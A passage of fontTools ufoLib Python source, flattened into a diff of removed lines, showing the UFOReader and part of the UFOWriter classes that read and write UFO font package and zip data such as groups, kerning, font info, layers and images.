The errors that could be raised during the writing of a plist are - unpredictable and/or too large to list, so, a blind try: except: is done. - If an exception occurs, a UFOLibError will be raised. - """ - if self._havePreviousFile: - try: - data = plistlib.dumps(obj) - except Exception as e: - raise UFOLibError( - "'%s' could not be written on %s because " - "the data is not properly formatted: %s" % (fileName, self.fs, e) - ) - if self.fs.exists(fileName) and data == self.fs.readbytes(fileName): - return - self.fs.writebytes(fileName, data) - else: - with self.fs.openbin(fileName, mode="w") as fp: - try: - plistlib.dump(obj, fp) - except Exception as e: - raise UFOLibError( - "'%s' could not be written on %s because " - "the data is not properly formatted: %s" - % (fileName, self.fs, e) - ) - - -# ---------- -# UFO Reader -# ---------- - - -class UFOReader(_UFOBaseIO): - - """ - Read the various components of the .ufo. - - By default read data is validated. Set ``validate`` to - ``False`` to not validate the data. - """ - - def __init__(self, path, validate=True): - if hasattr(path, "__fspath__"): # support os.PathLike objects - path = path.__fspath__() - - if isinstance(path, str): - structure = _sniffFileStructure(path) - try: - if structure is UFOFileStructure.ZIP: - parentFS = fs.zipfs.ZipFS(path, write=False, encoding="utf-8") - else: - parentFS = fs.osfs.OSFS(path) - except fs.errors.CreateFailed as e: - raise UFOLibError(f"unable to open '{path}': {e}") - - if structure is UFOFileStructure.ZIP: - # .ufoz zip files must contain a single root directory, with arbitrary - # name, containing all the UFO files - rootDirs = [ - p.name - for p in parentFS.scandir("/") - # exclude macOS metadata contained in zip file - if p.is_dir and p.name != "__MACOSX" - ] - if len(rootDirs) == 1: - # 'ClosingSubFS' ensures that the parent zip file is closed when - # its root subdirectory is closed - self.fs = parentFS.opendir( - rootDirs[0], factory=fs.subfs.ClosingSubFS - ) - else: - raise UFOLibError( - "Expected exactly 1 root directory, found %d" % len(rootDirs) - ) - else: - # normal UFO 'packages' are just a single folder - self.fs = parentFS - # when passed a path string, we make sure we close the newly opened fs - # upon calling UFOReader.close method or context manager's __exit__ - self._shouldClose = True - self._fileStructure = structure - elif isinstance(path, fs.base.FS): - filesystem = path - try: - filesystem.check() - except fs.errors.FilesystemClosed: - raise UFOLibError("the filesystem '%s' is closed" % path) - else: - self.fs = filesystem - try: - path = filesystem.getsyspath("/") - except fs.errors.NoSysPath: - # network or in-memory FS may not map to the local one - path = str(filesystem) - # when user passed an already initialized fs instance, it is her - # responsibility to close it, thus UFOReader.close/__exit__ are no-op - self._shouldClose = False - # default to a 'package' structure - self._fileStructure = UFOFileStructure.PACKAGE - else: - raise TypeError( - "Expected a path string or fs.base.FS object, found '%s'" - % type(path).__name__ - ) - self._path = fsdecode(path) - self._validate = validate - self._upConvertedKerningData = None - - try: - self.readMetaInfo(validate=validate) - except UFOLibError: - self.close() - raise - - # properties - - def _get_path(self): - import warnings - - warnings.warn( - "The 'path' attribute is deprecated; use the 'fs' attribute instead", - DeprecationWarning, - stacklevel=2, - ) - return self._path - - path = property(_get_path, doc="The path of the UFO (DEPRECATED).") - - def _get_formatVersion(self): - import warnings - - warnings.warn( - "The 'formatVersion' attribute is deprecated; use the 'formatVersionTuple'", - DeprecationWarning, - stacklevel=2, - ) - return self._formatVersion.major - - formatVersion = property( - _get_formatVersion, - doc="The (major) format version of the UFO. DEPRECATED: Use formatVersionTuple", - ) - - @property - def formatVersionTuple(self): - """The (major, minor) format version of the UFO. - This is determined by reading metainfo.plist during __init__. - """ - return self._formatVersion - - def _get_fileStructure(self): - return self._fileStructure - - fileStructure = property( - _get_fileStructure, - doc=( - "The file structure of the UFO: " - "either UFOFileStructure.ZIP or UFOFileStructure.PACKAGE" - ), - ) - - # up conversion - - def _upConvertKerning(self, validate): - """ - Up convert kerning and groups in UFO 1 and 2. - The data will be held internally until each bit of data - has been retrieved. The conversion of both must be done - at once, so the raw data is cached and an error is raised - if one bit of data becomes obsolete before it is called. - - ``validate`` will validate the data. - """ - if self._upConvertedKerningData: - testKerning = self._readKerning() - if testKerning != self._upConvertedKerningData["originalKerning"]: - raise UFOLibError( - "The data in kerning.plist has been modified since it was converted to UFO 3 format." - ) - testGroups = self._readGroups() - if testGroups != self._upConvertedKerningData["originalGroups"]: - raise UFOLibError( - "The data in groups.plist has been modified since it was converted to UFO 3 format." - ) - else: - groups = self._readGroups() - if validate: - invalidFormatMessage = "groups.plist is not properly formatted." - if not isinstance(groups, dict): - raise UFOLibError(invalidFormatMessage) - for groupName, glyphList in groups.items(): - if not isinstance(groupName, str): - raise UFOLibError(invalidFormatMessage) - elif not isinstance(glyphList, list): - raise UFOLibError(invalidFormatMessage) - for glyphName in glyphList: - if not isinstance(glyphName, str): - raise UFOLibError(invalidFormatMessage) - self._upConvertedKerningData = dict( - kerning={}, - originalKerning=self._readKerning(), - groups={}, - originalGroups=groups, - ) - # convert kerning and groups - kerning, groups, conversionMaps = convertUFO1OrUFO2KerningToUFO3Kerning( - self._upConvertedKerningData["originalKerning"], - deepcopy(self._upConvertedKerningData["originalGroups"]), - self.getGlyphSet(), - ) - # store - self._upConvertedKerningData["kerning"] = kerning - self._upConvertedKerningData["groups"] = groups - self._upConvertedKerningData["groupRenameMaps"] = conversionMaps - - # support methods - - def readBytesFromPath(self, path): - """ - Returns the bytes in the file at the given path. - The path must be relative to the UFO's filesystem root. - Returns None if the file does not exist. - """ - try: - return self.fs.readbytes(fsdecode(path)) - except fs.errors.ResourceNotFound: - return None - - def getReadFileForPath(self, path, encoding=None): - """ - Returns a file (or file-like) object for the file at the given path. - The path must be relative to the UFO path. - Returns None if the file does not exist. - By default the file is opened in binary mode (reads bytes). - If encoding is passed, the file is opened in text mode (reads str). - - Note: The caller is responsible for closing the open file. - """ - path = fsdecode(path) - try: - if encoding is None: - return self.fs.openbin(path) - else: - return self.fs.open(path, mode="r", encoding=encoding) - except fs.errors.ResourceNotFound: - return None - - # metainfo.plist - - def _readMetaInfo(self, validate=None): - """ - Read metainfo.plist and return raw data. Only used for internal operations. - - ``validate`` will validate the read data, by default it is set - to the class's validate value, can be overridden. - """ - if validate is None: - validate = self._validate - data = self._getPlist(METAINFO_FILENAME) - if validate and not isinstance(data, dict): - raise UFOLibError("metainfo.plist is not properly formatted.") - try: - formatVersionMajor = data["formatVersion"] - except KeyError: - raise UFOLibError( - f"Missing required formatVersion in '{METAINFO_FILENAME}' on {self.fs}" - ) - formatVersionMinor = data.setdefault("formatVersionMinor", 0) - - try: - formatVersion = UFOFormatVersion((formatVersionMajor, formatVersionMinor)) - except ValueError as e: - unsupportedMsg = ( - f"Unsupported UFO format ({formatVersionMajor}.{formatVersionMinor}) " - f"in '{METAINFO_FILENAME}' on {self.fs}" - ) - if validate: - from fontTools.ufoLib.errors import UnsupportedUFOFormat - - raise UnsupportedUFOFormat(unsupportedMsg) from e - - formatVersion = UFOFormatVersion.default() - logger.warning( - "%s. Assuming the latest supported version (%s). " - "Some data may be skipped or parsed incorrectly", - unsupportedMsg, - formatVersion, - ) - data["formatVersionTuple"] = formatVersion - return data - - def readMetaInfo(self, validate=None): - """ - Read metainfo.plist and set formatVersion. Only used for internal operations. - - ``validate`` will validate the read data, by default it is set - to the class's validate value, can be overridden. - """ - data = self._readMetaInfo(validate=validate) - self._formatVersion = data["formatVersionTuple"] - - # groups.plist - - def _readGroups(self): - groups = self._getPlist(GROUPS_FILENAME, {}) - # remove any duplicate glyphs in a kerning group - for groupName, glyphList in groups.items(): - if groupName.startswith(("public.kern1.", "public.kern2.")): - groups[groupName] = list(OrderedDict.fromkeys(glyphList)) - return groups - - def readGroups(self, validate=None): - """ - Read groups.plist. Returns a dict. - ``validate`` will validate the read data, by default it is set to the - class's validate value, can be overridden. - """ - if validate is None: - validate = self._validate - # handle up conversion - if self._formatVersion < UFOFormatVersion.FORMAT_3_0: - self._upConvertKerning(validate) - groups = self._upConvertedKerningData["groups"] - # normal - else: - groups = self._readGroups() - if validate: - valid, message = groupsValidator(groups) - if not valid: - raise UFOLibError(message) - return groups - - def getKerningGroupConversionRenameMaps(self, validate=None): - """ - Get maps defining the renaming that was done during any - needed kerning group conversion. This method returns a - dictionary of this form:: - - { - "side1" : {"old group name" : "new group name"}, - "side2" : {"old group name" : "new group name"} - } - - When no conversion has been performed, the side1 and side2 - dictionaries will be empty. - - ``validate`` will validate the groups, by default it is set to the - class's validate value, can be overridden. - """ - if validate is None: - validate = self._validate - if self._formatVersion >= UFOFormatVersion.FORMAT_3_0: - return dict(side1={}, side2={}) - # use the public group reader to force the load and - # conversion of the data if it hasn't happened yet. - self.readGroups(validate=validate) - return self._upConvertedKerningData["groupRenameMaps"] - - # fontinfo.plist - - def _readInfo(self, validate): - data = self._getPlist(FONTINFO_FILENAME, {}) - if validate and not isinstance(data, dict): - raise UFOLibError("fontinfo.plist is not properly formatted.") - return data - - def readInfo(self, info, validate=None): - """ - Read fontinfo.plist. It requires an object that allows - setting attributes with names that follow the fontinfo.plist - version 3 specification. This will write the attributes - defined in the file into the object. - - ``validate`` will validate the read data, by default it is set to the - class's validate value, can be overridden. - """ - if validate is None: - validate = self._validate - infoDict = self._readInfo(validate) - infoDataToSet = {} - # version 1 - if self._formatVersion == UFOFormatVersion.FORMAT_1_0: - for attr in fontInfoAttributesVersion1: - value = infoDict.get(attr) - if value is not None: - infoDataToSet[attr] = value - infoDataToSet = _convertFontInfoDataVersion1ToVersion2(infoDataToSet) - infoDataToSet = _convertFontInfoDataVersion2ToVersion3(infoDataToSet) - # version 2 - elif self._formatVersion == UFOFormatVersion.FORMAT_2_0: - for attr, dataValidationDict in list( - fontInfoAttributesVersion2ValueData.items() - ): - value = infoDict.get(attr) - if value is None: - continue - infoDataToSet[attr] = value - infoDataToSet = _convertFontInfoDataVersion2ToVersion3(infoDataToSet) - # version 3.x - elif self._formatVersion.major == UFOFormatVersion.FORMAT_3_0.major: - for attr, dataValidationDict in list( - fontInfoAttributesVersion3ValueData.items() - ): - value = infoDict.get(attr) - if value is None: - continue - infoDataToSet[attr] = value - # unsupported version - else: - raise NotImplementedError(self._formatVersion) - # validate data - if validate: - infoDataToSet = validateInfoVersion3Data(infoDataToSet) - # populate the object - for attr, value in list(infoDataToSet.items()): - try: - setattr(info, attr, value) - except AttributeError: - raise UFOLibError( - "The supplied info object does not support setting a necessary attribute (%s)." - % attr - ) - - # kerning.plist - - def _readKerning(self): - data = self._getPlist(KERNING_FILENAME, {}) - return data - - def readKerning(self, validate=None): - """ - Read kerning.plist. Returns a dict. - - ``validate`` will validate the kerning data, by default it is set to the - class's validate value, can be overridden. - """ - if validate is None: - validate = self._validate - # handle up conversion - if self._formatVersion < UFOFormatVersion.FORMAT_3_0: - self._upConvertKerning(validate) - kerningNested = self._upConvertedKerningData["kerning"] - # normal - else: - kerningNested = self._readKerning() - if validate: - valid, message = kerningValidator(kerningNested) - if not valid: - raise UFOLibError(message) - # flatten - kerning = {} - for left in kerningNested: - for right in kerningNested[left]: - value = kerningNested[left][right] - kerning[left, right] = value - return kerning - - # lib.plist - - def readLib(self, validate=None): - """ - Read lib.plist. Returns a dict. - - ``validate`` will validate the data, by default it is set to the - class's validate value, can be overridden. - """ - if validate is None: - validate = self._validate - data = self._getPlist(LIB_FILENAME, {}) - if validate: - valid, message = fontLibValidator(data) - if not valid: - raise UFOLibError(message) - return data - - # features.fea - - def readFeatures(self): - """ - Read features.fea. Return a string. - The returned string is empty if the file is missing. - """ - try: - with self.fs.open(FEATURES_FILENAME, "r", encoding="utf-8") as f: - return f.read() - except fs.errors.ResourceNotFound: - return "" - - # glyph sets & layers - - def _readLayerContents(self, validate): - """ - Rebuild the layer contents list by checking what glyphsets - are available on disk. - - ``validate`` will validate the layer contents. - """ - if self._formatVersion < UFOFormatVersion.FORMAT_3_0: - return [(DEFAULT_LAYER_NAME, DEFAULT_GLYPHS_DIRNAME)] - contents = self._getPlist(LAYERCONTENTS_FILENAME) - if validate: - valid, error = layerContentsValidator(contents, self.fs) - if not valid: - raise UFOLibError(error) - return contents - - def getLayerNames(self, validate=None): - """ - Get the ordered layer names from layercontents.plist. - - ``validate`` will validate the data, by default it is set to the - class's validate value, can be overridden. - """ - if validate is None: - validate = self._validate - layerContents = self._readLayerContents(validate) - layerNames = [layerName for layerName, directoryName in layerContents] - return layerNames - - def getDefaultLayerName(self, validate=None): - """ - Get the default layer name from layercontents.plist. - - ``validate`` will validate the data, by default it is set to the - class's validate value, can be overridden. - """ - if validate is None: - validate = self._validate - layerContents = self._readLayerContents(validate) - for layerName, layerDirectory in layerContents: - if layerDirectory == DEFAULT_GLYPHS_DIRNAME: - return layerName - # this will already have been raised during __init__ - raise UFOLibError("The default layer is not defined in layercontents.plist.") - - def getGlyphSet(self, layerName=None, validateRead=None, validateWrite=None): - """ - Return the GlyphSet associated with the - glyphs directory mapped to layerName - in the UFO. If layerName is not provided, - the name retrieved with getDefaultLayerName - will be used. - - ``validateRead`` will validate the read data, by default it is set to the - class's validate value, can be overridden. - ``validateWrite`` will validate the written data, by default it is set to the - class's validate value, can be overridden. - """ - from fontTools.ufoLib.glifLib import GlyphSet - - if validateRead is None: - validateRead = self._validate - if validateWrite is None: - validateWrite = self._validate - if layerName is None: - layerName = self.getDefaultLayerName(validate=validateRead) - directory = None - layerContents = self._readLayerContents(validateRead) - for storedLayerName, storedLayerDirectory in layerContents: - if layerName == storedLayerName: - directory = storedLayerDirectory - break - if directory is None: - raise UFOLibError('No glyphs directory is mapped to "%s".' % layerName) - try: - glyphSubFS = self.fs.opendir(directory) - except fs.errors.ResourceNotFound: - raise UFOLibError(f"No '{directory}' directory for layer '{layerName}'") - return GlyphSet( - glyphSubFS, - ufoFormatVersion=self._formatVersion, - validateRead=validateRead, - validateWrite=validateWrite, - expectContentsFile=True, - ) - - def getCharacterMapping(self, layerName=None, validate=None): - """ - Return a dictionary that maps unicode values (ints) to - lists of glyph names. - """ - if validate is None: - validate = self._validate - glyphSet = self.getGlyphSet( - layerName, validateRead=validate, validateWrite=True - ) - allUnicodes = glyphSet.getUnicodes() - cmap = {} - for glyphName, unicodes in allUnicodes.items(): - for code in unicodes: - if code in cmap: - cmap[code].append(glyphName) - else: - cmap[code] = [glyphName] - return cmap - - # /data - - def getDataDirectoryListing(self): - """ - Returns a list of all files in the data directory. - The returned paths will be relative to the UFO. - This will not list directory names, only file names. - Thus, empty directories will be skipped. - """ - try: - self._dataFS = self.fs.opendir(DATA_DIRNAME) - except fs.errors.ResourceNotFound: - return [] - except fs.errors.DirectoryExpected: - raise UFOLibError('The UFO contains a "data" file instead of a directory.') - try: - # fs Walker.files method returns "absolute" paths (in terms of the - # root of the 'data' SubFS), so we strip the leading '/' to make - # them relative - return [p.lstrip("/") for p in self._dataFS.walk.files()] - except fs.errors.ResourceError: - return [] - - def getImageDirectoryListing(self, validate=None): - """ - Returns a list of all image file names in - the images directory. Each of the images will - have been verified to have the PNG signature. - - ``validate`` will validate the data, by default it is set to the - class's validate value, can be overridden. - """ - if self._formatVersion < UFOFormatVersion.FORMAT_3_0: - return [] - if validate is None: - validate = self._validate - try: - self._imagesFS = imagesFS = self.fs.opendir(IMAGES_DIRNAME) - except fs.errors.ResourceNotFound: - return [] - except fs.errors.DirectoryExpected: - raise UFOLibError( - 'The UFO contains an "images" file instead of a directory.' - ) - result = [] - for path in imagesFS.scandir("/"): - if path.is_dir: - # silently skip this as version control - # systems often have hidden directories - continue - if validate: - with imagesFS.openbin(path.name) as fp: - valid, error = pngValidator(fileObj=fp) - if valid: - result.append(path.name) - else: - result.append(path.name) - return result - - def readData(self, fileName): - """ - Return bytes for the file named 'fileName' inside the 'data/' directory. - """ - fileName = fsdecode(fileName) - try: - try: - dataFS = self._dataFS - except AttributeError: - # in case readData is called before getDataDirectoryListing - dataFS = self.fs.opendir(DATA_DIRNAME) - data = dataFS.readbytes(fileName) - except fs.errors.ResourceNotFound: - raise UFOLibError(f"No data file named '{fileName}' on {self.fs}") - return data - - def readImage(self, fileName, validate=None): - """ - Return image data for the file named fileName. - - ``validate`` will validate the data, by default it is set to the - class's validate value, can be overridden. - """ - if validate is None: - validate = self._validate - if self._formatVersion < UFOFormatVersion.FORMAT_3_0: - raise UFOLibError( - f"Reading images is not allowed in UFO {self._formatVersion.major}." - ) - fileName = fsdecode(fileName) - try: - try: - imagesFS = self._imagesFS - except AttributeError: - # in case readImage is called before getImageDirectoryListing - imagesFS = self.fs.opendir(IMAGES_DIRNAME) - data = imagesFS.readbytes(fileName) - except fs.errors.ResourceNotFound: - raise UFOLibError(f"No image file named '{fileName}' on {self.fs}") - if validate: - valid, error = pngValidator(data=data) - if not valid: - raise UFOLibError(error) - return data - - def close(self): - if self._shouldClose: - self.fs.close() - - def __enter__(self): - return self - - def __exit__(self, exc_type, exc_value, exc_tb): - self.close() - - -# ---------- -# UFO Writer -# ---------- - - -class UFOWriter(UFOReader): - - """ - Write the various components of the .ufo. - - By default, the written data will be validated before writing. Set ``validate`` to - ``False`` if you do not want to validate the data. Validation can also be overriden - on a per method level if desired. - - The ``formatVersion`` argument allows to specify the UFO format version as a tuple - of integers (major, minor), or as a single integer for the major digit only (minor - is implied as 0). By default the latest formatVersion will be used; currently it's - 3.0, which is equivalent to formatVersion=(3, 0). - - An UnsupportedUFOFormat exception is raised if the requested UFO formatVersion is - not supported. - """ - - def __init__( - self, - path, - formatVersion=None, - fileCreator="com.github.fonttools.ufoLib", - structure=None, - validate=True, - ): - try: - formatVersion = UFOFormatVersion(formatVersion) - except ValueError as e: - from fontTools.ufoLib.errors import UnsupportedUFOFormat - - raise UnsupportedUFOFormat( - f"Unsupported UFO format: {formatVersion!r}" - ) from e - - if hasattr(path, "__fspath__"): # support os.PathLike objects - path = path.__fspath__() - - if isinstance(path, str): - # normalize path by removing trailing or double slashes - path = os.path.normpath(path) - havePreviousFile = os.path.exists(path) - if havePreviousFile: - # ensure we use the same structure as the destination - existingStructure = _sniffFileStructure(path) - if structure is not None: - try: - structure = UFOFileStructure(structure) - except ValueError: - raise UFOLibError( - "Invalid or unsupported structure: '%s'" % structure - ) - if structure is not existingStructure: - raise UFOLibError( - "A UFO with a different structure (%s) already exists " - "at the given path: '%s'" % (existingStructure, path) - ) - else: - structure = existingStructure - else: - # if not exists, default to 'package' structure - if structure is None: - structure = UFOFileStructure.PACKAGE - dirName = os.path.dirname(path) - if dirName and not os.path.isdir(dirName): - raise UFOLibError( - "Cannot write to '%s': directory does not exist" % path - ) - if structure is UFOFileStructure.ZIP: - if havePreviousFile: - # we can't write a zip in-place, so we have to copy its - # contents to a temporary location and work from there, then - # upon closing UFOWriter we create the final zip file - parentFS = fs.tempfs.TempFS() - with fs.zipfs.ZipFS(path, encoding="utf-8") as origFS: - fs.copy.copy_fs(origFS, parentFS) - # if output path is an existing zip, we require that it contains - # one, and only one, root directory (with arbitrary name), in turn - # containing all the existing UFO contents - rootDirs = [ - p.name - for p in parentFS.scandir("/") - # exclude macOS metadata contained in zip file - if p.is_dir and p.name != "__MACOSX" - ] - if len(rootDirs) != 1: - raise UFOLibError( - "Expected exactly 1 root directory, found %d" - % len(rootDirs) - ) - else: - # 'ClosingSubFS' ensures that the parent filesystem is closed - # when its root subdirectory is closed - self.fs = parentFS.opendir( - rootDirs[0], factory=fs.subfs.ClosingSubFS - ) - else: - # if the output zip file didn't exist, we create the root folder; - # we name it the same as input 'path', but with '.ufo' extension - rootDir = os.path.splitext(os.path.basename(path))[0] + ".ufo" - parentFS = fs.zipfs.ZipFS(path, write=True, encoding="utf-8") - parentFS.makedir(rootDir) - self.fs = parentFS.opendir(rootDir, factory=fs.subfs.ClosingSubFS) - else: - self.fs = fs.osfs.OSFS(path, create=True) - self._fileStructure = structure - self._havePreviousFile = havePreviousFile - self._shouldClose = True - elif isinstance(path, fs.base.FS): - filesystem = path - try: - filesystem.check() - except fs.errors.FilesystemClosed: - raise UFOLibError("the filesystem '%s' is closed" % path) - else: - self.fs = filesystem - try: - path = filesystem.getsyspath("/") - except fs.errors.NoSysPath: - # network or in-memory FS may not map to the local one - path = str(filesystem) - # if passed an FS object, always use 'package' structure - if structure and structure is not UFOFileStructure.PACKAGE: - import warnings - - warnings.warn( - "The 'structure' argument is not used when input is an FS object", - UserWarning, - stacklevel=2, - ) - self._fileStructure = UFOFileStructure.PACKAGE - # if FS contains a "metainfo.plist", we consider it non-empty - self._havePreviousFile = filesystem.exists(METAINFO_FILENAME) - # the user is responsible for closing the FS object - self._shouldClose = False - else: - raise TypeError( - "Expected a path string or fs object, found %s" % type(path).__name__ - ) - - # establish some basic stuff - self._path = fsdecode(path) - self._formatVersion = formatVersion - self._fileCreator = fileCreator - self._downConversionKerningData = None - self._validate = validate - # if the file already exists, get the format version. - # this will be needed for up and down conversion. - previousFormatVersion = None - if self._havePreviousFile: - metaInfo = self._readMetaInfo(validate=validate) - previousFormatVersion = metaInfo["formatVersionTuple"] - # catch down conversion - if previousFormatVersion > formatVersion: - from fontTools.ufoLib.errors import UnsupportedUFOFormat - - raise UnsupportedUFOFormat( - "The UFO located at this path is a higher version " - f"({previousFormatVersion}) than the version ({formatVersion}) " - "that is trying to be written. This is not supported." - ) - # handle the layer contents - self.layerContents = {} - if previousFormatVersion is not None and previousFormatVersion.major >= 3: - # already exists - self.layerContents = OrderedDict(self._readLayerContents(validate)) - else: - # previous < 3 - # imply the layer contents - if self.fs.exists(DEFAULT_GLYPHS_DIRNAME): - self.layerContents = {DEFAULT_LAYER_NAME: DEFAULT_GLYPHS_DIRNAME} - # write the new metainfo - self._writeMetaInfo() - - # properties - - def _get_fileCreator(self): - return self._fileCreator - - fileCreator = property( - _get_fileCreator, - doc="The file creator of the UFO. This is set into metainfo.plist during __init__.", - ) - - # support methods for file system interaction - - def copyFromReader(self, reader, sourcePath, destPath): - """ - Copy the sourcePath in the provided UFOReader to destPath - in this writer. The paths must be relative. This works with - both individual files and directories. - """ - if not isinstance(reader, UFOReader): - raise UFOLibError("The reader must be an instance of UFOReader.") - sourcePath = fsdecode(sourcePath) - destPath = fsdecode(destPath) - if not reader.fs.exists(sourcePath): - raise UFOLibError( - 'The reader does not have data located at "%s".' % sourcePath - ) - if self.fs.exists(destPath): - raise UFOLibError('A file named "%s" already exists.' % destPath) - # create the destination directory if it doesn't exist - self.fs.makedirs(fs.path.dirname(destPath), recreate=True) - if reader.fs.isdir(sourcePath): - fs.copy.copy_dir(reader.fs, sourcePath, self.fs, destPath) - else: - fs.copy.copy_file(reader.fs, sourcePath, self.fs, destPath) - - def writeBytesToPath(self, path, data): - """ - Write bytes to a path relative to the UFO filesystem's root. - If writing to an existing UFO, check to see if data matches the data - that is already in the file at path; if so, the file is not rewritten - so that the modification date is preserved. - If needed, the directory tree for the given path will be built. - """ - path = fsdecode(path) - if self._havePreviousFile: - if self.fs.isfile(path) and data == self.fs.readbytes(path): - return - try: - self.fs.writebytes(path, data) - except fs.errors.FileExpected: - raise UFOLibError("A directory exists at '%s'" % path) - except fs.errors.ResourceNotFound: - self.fs.makedirs(fs.path.dirname(path), recreate=True) - self.fs.writebytes(path, data) - - def getFileObjectForPath(self, path, mode="w", encoding=None): - """ - Returns a file (or file-like) object for the - file at the given path. The path must be relative - to the UFO path. Returns None if the file does - not exist and the mode is "r" or "rb. - An encoding may be passed if the file is opened in text mode. - - Note: The caller is responsible for closing the open file. - """ - path = fsdecode(path) - try: - return self.fs.open(path, mode=mode, encoding=encoding) - except fs.errors.ResourceNotFound as e: - m = mode[0] - if m == "r": - # XXX I think we should just let it raise. The docstring, - # however, says that this returns None if mode is 'r' - return None - elif m == "w" or m == "a" or m == "x": - self.fs.makedirs(fs.path.dirname(path), recreate=True) - return self.fs.open(path, mode=mode, encoding=encoding) - except fs.errors.ResourceError as e: - return UFOLibError(f"unable to open '{path}' on {self.fs}: {e}") - - def removePath(self, path, force=False, removeEmptyParents=True): - """ - Remove the file (or directory) at path. The path - must be relative to the UFO. - Raises UFOLibError if the path doesn't exist. - If force=True, ignore non-existent paths. - If the directory where 'path' is located becomes empty, it will - be automatically removed, unless 'removeEmptyParents' is False. - """ - path = fsdecode(path) - try: - self.fs.remove(path) - except fs.errors.FileExpected: - self.fs.removetree(path) - except fs.errors.ResourceNotFound: - if not force: - raise UFOLibError(f"'{path}' does not exist on {self.fs}") - if removeEmptyParents: - parent = fs.path.dirname(path) - if parent: - fs.tools.remove_empty(self.fs, parent) - - # alias kept for backward compatibility with old API - removeFileForPath = removePath - - # UFO mod time - - def setModificationTime(self): - """ - Set the UFO modification time to the current time. - This is never called automatically. It is up to the - caller to call this when finished working on the UFO. - """ - path = self._path - if path is not None and os.path.exists(path): - try: - # this may fail on some filesystems (e.g. SMB servers) - os.utime(path, None) - except OSError as e: - logger.warning("Failed to set modified time: %s", e) - - # metainfo.plist - - def _writeMetaInfo(self): - metaInfo = dict( - creator=self._fileCreator, - formatVersion=self._formatVersion.major, - ) - if self._formatVersion.minor != 0: - metaInfo["formatVersionMinor"] = self._formatVersion.minor - self._writePlist(METAINFO_FILENAME, metaInfo) - - # groups.plist - - def setKerningGroupConversionRenameMaps(self, maps): - """ - Set maps defining the renaming that should be done - when writing groups and kerning in UFO 1 and UFO 2. - This will effectively undo the conversion done when - UFOReader reads this data. The dictionary should have - this form:: - - { - "side1" : {"group name to use when writing" : "group name in data"}, - "side2" : {"group name to use when writing" : "group name in data"} - } - - This is the same form returned by UFOReader's - getKerningGroupConversionRenameMaps method. - """ - if self._formatVersion >= UFOFormatVersion.FORMAT_3_0: - return # XXX raise an error here - # flip the dictionaries - remap = {} - for side in ("side1", "side2"): - for writeName, dataName in list(maps[side].items()): - remap[dataName] = writeName - self._downConversionKerningData = dict(groupRenameMap=remap) - - def writeGroups(self, groups, validate=None): - """ - Write groups.plist. This method requires a - dict of glyph groups as an argument. - - ``validate`` will validate the data, by default it is set to the - class's validate value, can be overridden. - """ - if validate is None: - validate = self._validate - # validate the data structure - if validate: - valid, message = groupsValidator(groups) - if not valid: - raise UFOLibError(message) - # down convert - if ( - self._formatVersion < UFOFormatVersion.FORMAT_3_0 - and self._downConversionKerningData is not None - ): - remap = self._downConversionKerningData["groupRenameMap"] - remappedGroups = {} - # there are some edge cases here that are ignored: - # 1. if a group is being renamed to a name that - # already exists, the existing group is always - # overwritten. (this is why there are two loops - # below.) there doesn't seem to be a logical - # solution to groups mismatching and overwriting - # with the specifiecd group seems like a better - # solution than throwing an error. - # 2. if side 1 and side 2 groups are being renamed - # to the same group name there is no check to - # ensure that the contents are identical. that - # is left up to the caller. - for name, contents in list(groups.items()): - if name in remap: - continue - remappedGroups[name] = contents - for name, contents in list(groups.items()): - if name not in remap: - continue - name = remap[name] - remappedGroups[name] = contents - groups = remappedGroups - # pack and write - groupsNew = {} - for key, value in groups.items(): - groupsNew[key] = list(value) - if groupsNew: - self._writePlist(GROUPS_FILENAME, groupsNew) - elif self._havePreviousFile: - self.removePath(GROUPS_FILENAME, force=True, removeEmptyParents=False) - - # fontinfo.plist - - def writeInfo(self, info, validate=None): - """ - Write info.plist. This method requires an object - that supports getting attributes that follow the - fontinfo.plist version 2 specification. Attributes - will be taken from the given object and written - into the file. - - ``validate`` will validate the data, by default it is set to the - class's validate value, can be overridden. - """ - if validate is None: - validate = self._validate - # gather version 3 data - infoData = {} - for attr in list(fontInfoAttributesVersion3ValueData.keys()): - if hasattr(info, attr): - try: - value = getattr(info, attr) - except AttributeError: - raise UFOLibError( - "The supplied info object does not support getting a necessary attribute (%s)." - % attr - ) - if value is None: - continue - infoData[attr] = value - # down convert data if necessary and validate - if self._formatVersion == UFOFormatVersion.FORMAT_3_0: - if validate: - infoData = validateInfoVersion3Data(infoData) - elif self._formatVersion == UFOFormatVersion.FORMAT_2_0: - infoData = _convertFontInfoDataVersion3ToVersion2(infoData) - if validate: - infoData = validateInfoVersion2Data(infoData) - elif self._formatVersion == UFOFormatVersion.FORMAT_1_0: - infoData = _convertFontInfoDataVersion3ToVersion2(infoData) - if validate: - infoData = validateInfoVersion2Data(infoData) - infoData = _convertFontInfoDataVersion2ToVersion1(infoData) - # write file if there is anything to write - if infoData: - self._writePlist(FONTINFO_FILENAME, infoData) - - # kerning.plist - - def writeKerning(self, kerning, validate=None): - """ - Write kerning.plist. This method requires a - dict of kerning pairs as an argument. - - This performs basic structural validation of the kerning, - but it does not check for compliance with the spec in - regards to conflicting pairs. The assumption is that the - kerning data being passed is standards compliant. - - ``validate`` will validate the data, by default it is set to the - class's validate value, can be overridden. - """ - if validate is None: - validate = self._validate - # validate the data structure - if validate: - invalidFormatMessage = "The kerning is not properly formatted." - if not isDictEnough(kerning): - raise UFOLibError(invalidFormatMessage) - for pair, value in list(kerning.items()): - if not isinstance(pair, (list, tuple)): - raise UFOLibError(invalidFormatMessage) - if not len(pair) == 2: - raise UFOLibError(invalidFormatMessage) - if not isinstance(pair[0], str): - raise UFOLibError(invalidFormatMessage) - if not isinstance(pair[1], str): - raise UFOLibError(invalidFormatMessage) - if not isinstance(value, numberTypes): - raise UFOLibError(invalidFormatMessage) - # down convert - if ( - self._formatVersion < UFOFormatVersion.FORMAT_3_0 - and self._downConversionKerningData is not None - ): - remap = self._downConversionKerningData["groupRenameMap"] - remappedKerning = {} - for (side1, side2), value in list(kerning.items()): - side1 = remap.get(side1, side1) - side2 = remap.get(side2, side2) - remappedKerning[side1, side2] = value - kerning = remappedKerning - # pack and write - kerningDict = {} - for left, right in kerning.keys(): - value = kerning[left, right] - if left not in kerningDict: - kerningDict[left] = {} - kerningDict[left][right] = value - if kerningDict: - self._writePlist(KERNING_FILENAME, kerningDict) - elif self._havePreviousFile: - self.removePath(KERNING_FILENAME, force=True, removeEmptyParents=False) - - # lib.plist - - def writeLib(self, libDict, validate=None): - """ - Write lib.plist. This method requires a - lib dict as an argument. - - ``validate`` will validate the data, by default it is set to the - class's validate value, can be overridden. - """ - if validate is None: - validate = self._validate - if validate: - valid, message = fontLibValidator(libDict) - if not 